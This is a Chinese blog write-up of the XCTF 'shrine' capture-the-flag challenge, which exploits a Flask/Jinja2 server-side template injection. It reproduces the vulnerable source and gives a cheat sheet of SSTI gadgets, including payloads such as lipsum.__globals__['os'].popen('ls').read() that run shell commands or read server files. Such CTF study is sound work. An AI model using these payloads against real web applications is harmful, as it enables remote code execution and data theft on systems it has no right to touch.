XCTF shrine wp

最新推荐文章于 2024-11-17 22:03:55 发布

Farii

最新推荐文章于 2024-11-17 22:03:55 发布

阅读量320

点赞数 4

CC 4.0 BY-SA版权

分类专栏： ctf 文章标签： flask python 后端网络安全

本文链接：https://blog.youkuaiyun.com/Lakers248_/article/details/124729620

ctf 专栏收录该内容

3 篇文章

订阅专栏

这篇博客探讨了一个Python Flask应用中的安全漏洞，具体为Server-Side Template Injection (SSTI)。作者展示了如何利用`url_for`、`current_app`等内部对象访问应用程序配置，特别是`config['FLAG']`来获取隐藏的Flag。通过测试，作者成功执行了代码并揭示了利用SSTI漏洞的多种方法，包括对`__globals__`、`__builtins__`的操纵。博客还列举了一系列与Flask框架和Python编程相关的技术点。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

进入网页发现是个python代码

整理可得

import flask 

import os 

app = flask.Flask(__name__) 

app.config['FLAG'] = os.environ.pop('FLAG') 

@app.route('/') 

def index(): 
return open(__file__).read() 

@app.route('/shrine/') 

def shrine(shrine): 

def safe_jinja(s): 

s = s.replace('(', '').replace(')', '') 

blacklist = ['config', 'self'] 

return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s 

return flask.render_template_string(safe_jinja(shrine)) 

if __name__ == '__main__': app.run(debug=True)

根据代码百度了解到flask框架知道这个是flask在/shrine/的SSTI

这里是常用语句

__class__            类的一个内置属性，表示实例对象的类。
__base__             类型对象的直接基类
__bases__            类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__
__mro__              此属性是由类组成的元组，在方法解析期间会基于它来查找基类。
__subclasses__()     返回这个类的子类集合，Each class keeps a list of weak references to its immediate subclasses. This method returns a list of all those references still alive. The list is in definition order.
__init__             初始化类，返回的类型是function
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作的时候（形如：a.xxx/a.xxx()），都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
__getitem__()        调用字典中的键值，其实就是调用这个魔术方法，比如a['b']，就是a.__getitem__('b')
__builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。
__import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__('os').popen('ls').read()]
__str__()            返回描写这个对象的字符串，可以理解成就是打印出来。
url_for              flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。
get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__['__builtins__']含有current_app。
lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：{{lipsum.__globals__['os'].popen('ls').read()}}
current_app          应用上下文，一个全局变量。

request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
request.args.x1   	 get传参
request.values.x1 	 所有参数
request.cookies      cookies参数
request.headers      请求头参数
request.form.x1   	 post传参	(Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
request.data  		 post传参	(Content-Type:a/b)
request.json		 post传json  (Content-Type: application/json)
config               当前application的所有配置。此外，也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
g                    {{g}}得到<flask.g of 'flask_ssti'>

测试在/shrine/路径下{{1+1}}是否能执行